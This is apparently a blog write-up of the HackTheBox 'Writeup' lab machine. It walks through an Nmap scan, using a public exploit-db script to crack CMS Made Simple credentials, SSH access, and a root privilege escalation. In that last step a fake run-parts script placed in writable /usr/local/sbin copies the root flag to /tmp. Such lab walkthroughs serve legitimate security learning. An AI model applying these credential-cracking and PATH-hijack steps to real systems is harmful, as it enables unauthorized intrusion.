this post describes the process of finding the user and root flags in HackTheBox Writeup machine. So as always start with an Nmap scan to discover which services are running.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Nmap 7.70 scan initiated Tue Jun 25 12:42:32 2019 as: nmap -p- -O -sV -oN scan.txt 10.10.10.138
Nmap scan report for ip-10-10-10-138.eu-west-2.compute.internal (10.10.10.138)
Host is up (0.016s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 25 12:44:27 2019 -- 1 IP address (1 host up) scanned in 115.24 seconds
From the output we can see that it is a Linux machine running an Apache web server on port 80 and OpenSSH on port 22. I start by browsing to the webserver where you are greeted with the following page:
There are no links on the page which proceed anywhere else. I browsed to robots.txt which displayed the following:
1
2
3
4
5
6
7
8
9
10
11
12
13
# __
# _(\ |@@|
# (__/\__ \--/ __
# \___|----| | __
# \ }{ /\ )_ / _\
# /\__/\ \__O (__
# (--/\--) \__/
# _)( )(_
# `---''---`
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
As you can see, they are disallowing spidering to a directory called writeup. So i browsed to the writeup directory where even more content was found.
If you view the source code of this page you can find at the top that it was generated using software called CMS Made Simple.
1
2
3
<base href="http://10.10.10.138/writeup/" />
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
All the pages on the website look to be writeups for other CTF’s. You can access the admin panel by browsing to the /admin directory. However this requires authentication and we don’t currently have any credentials. Any attempt to brute force this login page results in your IP being blocked for a couple of minutes. So brute forcing this page isn’t viable.
I searched online for some exploits that can be used against CMS Made easy and found the following code on exploit-db.
I downloaded and run the python file pointing it to the CMS made simple website and a wordlist used to crack the password. After abount 5 minutes the output provided you with a salt, username, email and cracked password found from the password list. You can see a partial output from the command below:
1
2
3
4
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeupm-
[*] Try: 2$
I tried the username and password found by the python script against the SSH session. This allowed me to login successfully into the machine as a standard user and capture the user flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~/Documents/writeup# ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 3 10:02:34 2019 from 10.10.13.246
jkr@writeup:~$ ls
user.txt
jkr@writeup:~$ cat user.txt
[REDACTED]
The next stage is to try and esclate privilages to become root user. I downloaded PSPY64 onto the machine. This allows you to view local processes running on the machine without being a root user. It also shows processes that may have spawned for a few seconds which allows you to get a history of what is happening on the machine while the software is running.
I noticed while viewing the output of PSPY64 that every time a user connects to the machine via SSH, a script is run which displays details about the machine in the MOTD once logged in.
1
2
3
4
5
6
2019/07/03 09:51:54 CMD: UID=102 PID=8198 | sshd: [accepted]
2019/07/03 09:51:56 CMD: UID=0 PID=8199 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2019/07/03 09:51:56 CMD: UID=0 PID=8200 | /bin/sh /usr/local/sbin/run-parts --lsbsysinit /etc/update-motd.d
2019/07/03 09:51:56 CMD: UID=0 PID=8201 | ls /root/
2019/07/03 09:51:56 CMD: UID=0 PID=8202 | sshd: jkr [priv]
2019/07/03 09:51:56 CMD: UID=1000 PID=8203 | sshd: jkr@pts/7
As you can see from the output, /etc/update-motd.d is run using some software called run-parts. This is run as root with the UID of 0. A PATH environment variable is also set before run-parts is executed. If we were to create out own script called run-parts, and then store it in a different PATH which is checked before the legitimate run-parts executable is discovered, we should then be able to run our own code as a root user.
the following PATH variables are set before run-parts is executed.
/usr/local/sbin
/usr/local/bin
/usr/sbin
/usr/bin
/sbin
/bin
It just so happens that /usr/local/sbin has write access as a standard user. I created a file in /usr/local/sbin called run parts with the following contents:
cat /root/root.txt > /tmp/f.txt
this will retrieve the output of the root flag in /root/root.txt and pipe it to /tmp/f.txt where a standard user account can access to read.
I then made the file executable:
1
jkr@writeup:/usr/local/sbin$ chmod +x run-parts
I then logged in via SSH in another window to cause my custom run-parts script to execute. Once logged in I checked the /tmp folder a a file called f.txt was present. and inside was the root flag:
1
2
jkr@writeup:/tmp$ cat f.txt
[REDACTED]